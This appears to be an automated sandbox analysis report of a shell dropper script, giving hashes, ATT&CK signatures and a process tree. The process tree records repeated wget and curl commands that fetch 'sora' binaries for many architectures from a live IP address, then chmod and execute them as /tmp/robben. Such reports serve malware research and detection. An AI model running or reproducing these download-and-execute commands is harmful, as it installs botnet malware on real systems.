Analysis
-
max time kernel
10s -
max time network
11s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
-
Size
2KB
-
MD5
5d873bf46fd4ff411eb17e42d5ae2980
-
SHA1
fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
-
SHA256
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
-
SHA512
f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 778 chmod 800 chmod 693 chmod 706 chmod 727 chmod 806 chmod 679 chmod 714 chmod 792 chmod 740 chmod 764 chmod 700 chmod 752 chmod 813 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 681 robben /tmp/robben 694 robben /tmp/robben 701 robben /tmp/robben 707 robben /tmp/robben 715 robben /tmp/robben 728 robben /tmp/robben 742 robben /tmp/robben 753 robben /tmp/robben 765 robben /tmp/robben 781 robben /tmp/robben 793 robben /tmp/robben 801 robben /tmp/robben 807 robben /tmp/robben 815 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 684 wget 687 curl 691 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Processes
-
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh1⤵
- Writes file to tmp directory
PID:655 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:657
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:666
-
-
/bin/catcat sora.x862⤵PID:676
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:679
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:681
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:684
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:687
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:691
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:694
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:696
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:698
-
-
/bin/catcat sora.x86_642⤵PID:699
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:701
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:703
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:704
-
-
/bin/catcat sora.i4682⤵PID:705
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:707
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:709
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:710
-
-
/bin/catcat sora.i6862⤵PID:713
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:715
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:719
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:722
-
-
/bin/catcat sora.mpsl2⤵PID:725
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:728
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:731
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:734
-
-
/bin/catcat sora.arm42⤵PID:738
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:744
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:747
-
-
/bin/catcat sora.arm52⤵PID:750
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:753
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:756
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:759
-
-
/bin/catcat sora.arm62⤵PID:762
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:765
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:768
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:772
-
-
/bin/catcat sora.arm72⤵PID:776
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:781
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:784
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:787
-
-
/bin/catcat sora.ppc2⤵PID:791
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:796
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:797
-
-
/bin/catcat sora.ppc440fp2⤵PID:799
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:803
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:804
-
-
/bin/catcat sora.m68k2⤵PID:805
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:807
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:809
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:810
-
-
/bin/catcat sora.sh42⤵PID:812
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:815
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1